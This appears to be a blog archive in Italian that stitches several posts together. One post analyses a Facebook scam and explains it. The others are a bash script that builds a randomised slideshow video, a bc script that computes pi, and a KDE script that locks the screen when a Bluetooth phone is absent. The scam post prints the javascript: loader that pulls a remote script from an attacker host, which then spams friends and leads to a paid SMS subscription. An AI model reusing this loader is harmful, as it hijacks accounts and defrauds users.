Fan page incriminata su Facebook

Innanzitutto copiare e incollare qualcosa che non si capisce (e che palesemente non è un indirizzo web) nella barra degli indirizzi è cosa cattiva e sbagliata. Facebook ce la mette tutta, filtrando i contenuti visualizzabili sulle sue pagine interne – e di fatti per aggirare le restrizioni che non permetterebbero il diffondersi di certi programmi (script) malevoli, il cattivone di turno deve affidarsi al mitico errore PEBKAC ( “Problem Exists Between Keyboard And Chair” ) ovvero all’utente poco saggio che fa tutto quello che gli dici senza sapere cosa sta facendo. Fantastico.

Andiamo oltre e vediamo qual’è il codice che dobbiamo copiare e incollare.

javascript:(a=(b=document).createElement('script')).src='//strummer5202.info/you/joe.php?'+Math.random(),
b.body.appendChild(a);
void(0)

Ho riformattato leggermente il codice per una più facile lettura. In pratica esegue un comando “inline” javascript che crea un elemento script e e nel campo SRC inserisce l’url  ”strummer5202.info/you/joe.php” concatenandoci un numero casuale. La seconda riga inserisce nel documento corrente lo script appena creato, mentre l’ultima linea non esegue nulla. Notare l’utilizzo della virgola invece del punto e virgola, è il “comma operator” – una finezza che non sono sicuro fosse necessaria.

Vediamo brevemente il codice che viene inserito nella pagina da questo comando:

// Il codice l'ho rimosso perchè mi rovinava il layout
// e comunque non era così interessante, se avete 
// conoscenza di AJAX, potete scrivervelo in pochi minuti
// da soli.

Senza entrare nel dettaglio, vediamo come come prima cosa legge un cookie, che evidentemente serve per comunicare con facebook – poi scarica la lista degli amici e inserisce il link sulla bacheca dei primi 400 amici. In seguito manipola lo stile della barra inferiore per nasconderla, e invia il link anche a tutti gli amici online in chat. Come ultima cosa, porta l’utente ad una pagina esterna a facebook, dove viene chiesto di verificare l’account inserendo il numero di telefono. La pagina si presenta come “verosimile” anche se lo stile non è proprio quello ufficiale di facebook, e l’italiano è un po’ troppo informale.

Inserisci il tuo numero e ritrovati il credito prosciugato.

Ovviamente non ho inserito il numero, ma è verosimile pensare che ci si abboni a qualche servizio a pagamento, possibilmente molto costoso – così oltre al danno anche la beffa. Il riquadro è un frame, che contiene un altro sito di servizi in abbonamento per telefoni cellulari. Non so se l’indirizzo viene generato dinamicamente, comunque il frame intero, e non ritagliato “ad hoc” contiene anche le informazioni sul servizio a cui ci si ritrova abbonati inserendo il proprio numero:

Servizio in abbonamento, riservato ai maggiorenni, disponibile per i clienti di TIM, Vodafone, WIND e 3. Prima di attivare il servizio e scaricare il contenuto, confermare di aver letto Termini di Servizio, [...] costo del servizio 5 Euro a settimana IVA inc. Dal costo del servizio è escluso il traffico WAP dove previsto. Costo SMS di richiesta TIM e WIND 12,4 centesimi IVA inc. (WIND: 50 centesimi IVA inc. dall’estero), Vodafone e 3 secondo proprio piano tariffario. [...] Per disattivare manda un SMS con scritto RI STOP al 4890897.

Il servizio sembra completamente legittimo (anche perchè in collaborazione con una grande azienda di telecomunicazioni), ho tagliato alcune parti in cui compare il nome del fornitore del servizio perché la mia impressione è che non centri assolutamente con l’autore del “virus” che voleva semplicemente fare più danni possibile.

UPDATE: mi hanno risposto via email i gestori del “frame” che veniva incluso nella pagina finale – ed ovviamente sono completamente estranei alla vicenda, io lascio il numero per la disattivazione del servizio nel caso qualche lettore sprovveduto si fosse a sua insaputa iscritto al servizio. Il sito “verifica-account.com” è già offline come anche il sito “strummer5202.info” – direi che le autorità o chi per loro (amministratori dei vari ISP coinvolti) sono stati veloci.

Per dare un effetto più “psichedelico” al video però decidemmo che le immagini dovevano comparire per un numero di frame variabile, fra i 2 e i 5 frame (che in un video a 25fps vuol dire, dagli 8 ai 20 centesimi di secondo) – così lo script è stato modificato di conseguenza.

Le immagini andavano montate in una sequenza casuale, e andavano ricercate nella cartella corrente e in tutte le sotto-cartelle – nessun problema in quanto l’utilizzo di find per trovare i file, e shuf per rimescolarne la lista rendono il compito davvero facile. I passaggi da fare prima di lanciare mencoder per la codifica finale sono: convertire le immagini alla risoluzione finale del video (in questo caso 720×576 PAL) e inserire un logo (al centro, ma è modificabile) – tutto questo viene fatto con convert e composite. Il loop finale crea un file list.txt contenente ad ogni riga il nome del file che deve comporre ogni frame del video – in questo caso tutte le immagini compaiono 10 volte, come impostato dalla variabile $ITER.

Lo script è molto grossolano – però funziona abbastanza bene, ed è comunque una base di partenza per chiunque abbia necessità di fare qualcosa di simile. Eccolo:

#!/bin/bash
SAVEIFS=$IFS
IFS=$(echo -en “\n\b”)

ITER=10
DIR=`mktemp -d`
LISTA=`find -iname *.jpg | shuf`
COUNT=0

for i in $LISTA; do
COUNT=$(($COUNT+1))
cp “$i” “$DIR/$COUNT.jpg”
done;

for i in `seq 1 $COUNT`; do
convert -resize 720×576! “$DIR/$i.jpg” “$DIR/$i.jpg”
# watermark
composite -gravity center logo.png $i.jpg $i.jpg
done;

for k in `seq 1 $ITER`; do
for i in `seq 1 $COUNT | shuf`; do
for j in `seq 1 $((2+$RANDOM%4))`; do
# 5FPS – for j in `seq 1 5`; do
echo “$DIR/$i.jpg” >> “$DIR/list.txt”
done;
done;
done;

mencoder mf://@$DIR/list.txt -mf w=720:h=576:fps=25:type=jpg -ovc lavc \
-lavcopts vcodec=mpeg4:mbd=2:trell -oac copy -o output.avi

IFS=$SAVEIFS

Purtroppo ho perso l’indentazione, non che sia necessaria per così poche righe di testo. Se non funzionasse, fate attenzione al comando mencoder spezzato su due linee… per altri problemi, ci sono i commenti!

#!/bin/bash

time bc -q -l << EOF
scale=$1
4*a(1)
quit
EOF

Rendetelo eseguibile (chmod a+x ./pi.sh) e ora lanciatelo seguito dal numero di cifre dopo la virgola che volete calcolare.

$ pi.sh 10
3.1415926532

real    0m0.009s
user    0m0.000s
sys     0m0.004s

Tenete conto che è un’approssimazione quindi l’ultima o le ultime due cifre non sono molto affidabili. E’ comunque un test carino (visto il “time”) per fare dei piccoli benchmark. Ma soprattutto la vostra curiosità dovrebbe spingeri fino a questa manpage:

NAME
bc – An arbitrary precision calculator language

Contenti?

Innanzitutto attivate il bluetooth sul cellulare (o qualsiasi altra periferica) e rendetelo visibile a tutti, ora date il comando

$ hcitool scan
Scanning …
00:13:57:9B:DF:24       Qualsiasi

Segnatevi il MAC address, nel mio caso (è finto) “00:13:57:9B:DF:24″, questa è la periferica che controllerà la sessione. Ora potete mettere il telefono in modalità “invisibile”, ma non spegnere il bluetooth.

Nella vostra home, andata in .kde4/Autostart

cd ~/.kde4/Autostart/

create un file contenente questo script (ad esempio lock.sh) sostituendo alla linea KEY_MAC quello che vi eravate segnati pocanzi:

#!/bin/bash

ENABLED=$(kdialog –yesno “Bluetooth Key?”;echo $?)

if [ "$ENABLED" != "0" ]; then
exit 0
fi

KEY_MAC=”00:13:57:9B:DF:24″;

while [ "1" ]; do
DEVNAME=`hcitool name $KEY_MAC`;

if [ -z "$DEVNAME" ]; then
qdbus org.freedesktop.ScreenSaver /ScreenSaver Lock
fi

sleep 60

done;

Rendete il file eseguibile, così

chmod a+x lock.sh

dal prossimo avvio di KDE4 una finestrella vi chiederà se in quella sessione volete usare questa possibilità, così potrete lavorare tranquilli anche quando dimenticherete il cellulare a casa, o quando è scarico.

Il controllo della presenza del telefono viene fatto ogni 60 secondi.